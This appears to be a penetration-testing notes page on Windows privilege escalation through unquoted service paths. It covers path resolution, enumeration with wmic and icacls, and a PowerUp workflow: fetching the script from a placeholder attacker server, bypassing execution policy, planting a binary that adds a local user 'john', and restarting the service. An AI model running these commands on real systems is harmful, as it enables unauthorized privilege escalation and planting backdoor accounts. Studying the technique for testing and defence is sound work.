Unquoted Service Paths

This attack relies on windows find an executable path when it's Unquoted.

Introduction

When the service starts the CreateProcess function execute, this function receives as a parameter lpApplicationName which is used to specify the path of the binary file. If the provided path is unquoted and include space, Then the windows service will interpreted it in various ways.

For example the path C:\Program Files\program folder\binary.exe will used in the following order:

C:\Program.exe
C:\Program Files\program.exe
C:\Program Files\program folder\binary.exe

Enumeration

Searching for vulnerable services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

Checking permission to create files in execute paths:

icacls "<path>"

The table below describes the permissions definitions icacls results:

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Exploit

The process is pretty similar to Service Binary Hijacking

Automated Process

It is possible to automate the process using well known tool called PowerUp from PowerSploit Collection:

PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploitGitHub

Downloading PowerUp.ps1:

iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1

Bypassing Execution Policy:

powershell -ep bypass

Importing PowerUp.ps1:

. .\PowerUp.ps1

Enumerate services with unquoted paths:

Get-UnquotedService

Exploiting by creating a malicious binary (the default behavior is to create a new local user called john with the password Password123!)

Write-ServiceBinary -Name '<service_name>' -Path "<binary_path>"

Triggering the exploit by restarting the service

Restart-Service <service_name>

References

PreviousService DLL Hijacking NextScheduled Tasks

Last updated 4 months ago